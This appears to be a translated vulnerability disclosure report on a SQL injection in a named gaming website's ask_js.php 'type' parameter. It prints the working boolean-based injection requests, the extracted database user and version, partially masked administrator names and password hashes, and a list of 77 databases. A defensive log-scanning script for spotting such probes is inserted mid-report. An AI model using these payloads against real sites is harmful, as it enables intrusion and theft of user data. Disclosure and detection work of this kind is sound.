2015-03-21: Details reported to the vendor, awaiting vendor handling
2015-03-21: Vendor confirmed the issue; details disclosed to the vendor only
2015-03-31: Details disclosed to core white hats and experts in related fields
2015-04-10: Details disclosed to regular white hats
2015-04-20: Details disclosed to intern white hats
2015-05-05: Details disclosed to the public

www.07073.com: an "or"-type SQL injection, size based (the two probes below differ only in the boolean suffix on the type parameter and return responses of different length)
R:
GET /plus/ask_js.php?type=20856465450%20or%201&pagesize=6&tmp=ul HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US)
Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5
Cache-Control: no-cache
Host: www.07073.com

P:
HTTP/1.1 200 OK
Server: nginx
Date: Fri, xx Mar 2015 xx GMT
Content-Type: text/html; charset=gb2312
Vary: Accept-Encoding
Vary: Accept-Encoding
X-Cache: MISS from xnop013-CT-FJPT-248-84.fastcdn.com
X-Cache: MISS from CT-SHHJ-190-96.fastcdn.com
Content-Length: 2304

R:
GET /plus/ask_js.php?type=20856465450%20or+0&pagesize=6&tmp=ul HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US)
Accept: */*
Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5
Cache-Control: no-cache
Host: www.07073.com

P:
HTTP/1.1 200 OK
Server: nginx
Date: Fri, xx Mar 2015 xxx GMT
Content-Type: text/html; charset=gb2312
Vary: Accept-Encoding
Vary: Accept-Encoding
X-Cache: MISS from xnop013-CT-FJPT-248-84.fastcdn.com
X-Cache: MISS from CT-SHHJ-190-96.fastcdn.com
Content-Length: 69

user()='[email protected]'
version()='5.6.10-log'
database()='www07073'
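The pair of requests above is the signature of a boolean-based (size-differential) injection probe: the same numeric id with "or 1" and "or 0" appended, and a 2304-byte versus 69-byte response. The following Python is an added example, not part of the original report, showing how a defender can spot that pattern in web-server access logs. The log lines are constructed in nginx "combined" format from the two requests in the report (the client IPs, timestamps and the third, benign line are invented); the script groups requests by client, path, parameter and numeric base value, and flags groups whose boolean-suffixed variants produced different response sizes.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed sample log lines (not real server logs). The first two mirror the
# probe pair in the report; the third is a normal request for the same id.
SAMPLE_LOG = """\
203.0.113.9 - - [20/Mar/2015:10:12:01 +0800] "GET /plus/ask_js.php?type=20856465450%20or%201&pagesize=6&tmp=ul HTTP/1.1" 200 2304 "-" "Mozilla/5.0"
203.0.113.9 - - [20/Mar/2015:10:12:03 +0800] "GET /plus/ask_js.php?type=20856465450%20or+0&pagesize=6&tmp=ul HTTP/1.1" 200 69 "-" "Mozilla/5.0"
198.51.100.4 - - [20/Mar/2015:10:13:10 +0800] "GET /plus/ask_js.php?type=20856465450&pagesize=6&tmp=ul HTTP/1.1" 200 2304 "-" "Mozilla/5.0"
"""

# nginx/Apache "combined" format: ip ident user [ts] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

# A numeric id immediately followed by a boolean operator, e.g. "20856465450 or 1".
# parse_qsl has already decoded %20 and '+' to spaces by the time this runs.
BOOL_SUFFIX_RE = re.compile(r'^\s*(?P<base>\d+)\s+(?:or|and)\b', re.IGNORECASE)


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    size = m.group("size")
    return {
        "ip": m.group("ip"),
        "path": parts.path,
        "params": parse_qsl(parts.query, keep_blank_values=True),
        "status": int(m.group("status")),
        "size": 0 if size == "-" else int(size),
    }


def boolean_probes(entry):
    """Yield (param_name, numeric_base, full_value) for every boolean-suffixed parameter."""
    for name, value in entry["params"]:
        m = BOOL_SUFFIX_RE.match(value)
        if m:
            yield name, m.group("base"), value


def find_probes(log_text):
    """Group boolean-suffixed requests by (ip, path, param, base) and report each group.

    A group is marked 'differential' when its variants returned more than one
    response size: that is the size-based signal the report relies on.
    """
    groups = defaultdict(list)
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        for name, base, value in boolean_probes(entry):
            groups[(entry["ip"], entry["path"], name, base)].append((value, entry["size"]))

    findings = []
    for (ip, path, name, base), hits in groups.items():
        sizes = {size for _, size in hits}
        findings.append({
            "ip": ip,
            "path": path,
            "param": name,
            "base": base,
            "values": [v for v, _ in hits],
            "sizes": sizes,
            "differential": len(sizes) > 1,
        })
    return findings


if __name__ == "__main__":
    for f in find_probes(SAMPLE_LOG):
        flag = "DIFFERENTIAL" if f["differential"] else "single probe"
        print(f"{f['ip']} {f['path']} param={f['param']} base={f['base']} "
              f"sizes={sorted(f['sizes'])} [{flag}]")
```

The benign third request is not flagged because its value is a bare number; only values that carry an "or"/"and" suffix enter a group. The same grouping, run over a real access log, is also the quickest way to confirm whether the vulnerable endpoint was probed by anyone other than the reporter before the fix went in.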
PS: I also found a problem with the site's cache design. To demonstrate the issue, a few administrator records are pasted here:

1        0  admin         d44254f1082727xxxx  <blank>
2        0  zhangshu      2a8e55171fc68xxx    <blank>
17598496 0  xlkslbccdtks  77db0bb41dexxx      <blank>
5        0  huahuade      7c39370ab6b4de6xxx  <blank>

All of the data tables here are reachable, so presumably every user is affected.

available databases [77]:
[*] 123_07073
[*] acg073
[*] adv07073
[*] advertising
[*] android07073
[*] askdata
[*] atlas07073
[*] baidu_xml_dev
[*] baobei
[*] bar07073
[*] bbs073
[*] bl07073
[*] box07073
[*] cache07073
[*] cartoon
[*] coderead
[*] comment
[*] datacenter
[*] db07073
[*] db07073_tx2
[*] db07073qn
[*] dbcache
[*] discuz
[*] dn07073
[*] dnf07073
[*] downloads
[*] duandi
[*] fahao073
[*] fahao10
[*] flash07073
[*] giftcode
[*] hdtemplates
[*] hi07073
[*] huodong
[*] information_schema
[*] iphonewy_x15
[*] iphonewy_x20
[*] jft073
[*] kaifuopen_hzhks
[*] kaifuopen_zjgtqxx
[*] kc07073
[*] kf07073
[*] kf07073b
[*] kf207073
[*] kf77745
[*] list07073
[*] mesearch
[*] mh073
[*] mobilenews
[*] molihai073
[*] monitor
[*] mysql
[*] nycc
[*] other_website
[*] paihang07073
[*] performance_schema
[*] shop073
[*] sy07073
[*] team07073
[*] tongji
[*] top2011
[*] tweibo
[*] ui073
[*] wap07073
[*] webbox
[*] weixin073
[*] wenwen073
[*] wow07073
[*] www.13cr.com
[*] www07073
[*] www07073bak
[*] xuan-astd
[*] xweibo
[*] youxi
[*] zhuanchu
[*] zhuanchu2
[*] zt07073
Severity: High
Vulnerability Rank: 20
Confirmed at: 2015-03-21 10:47
Thank you for providing the vulnerability information
None yet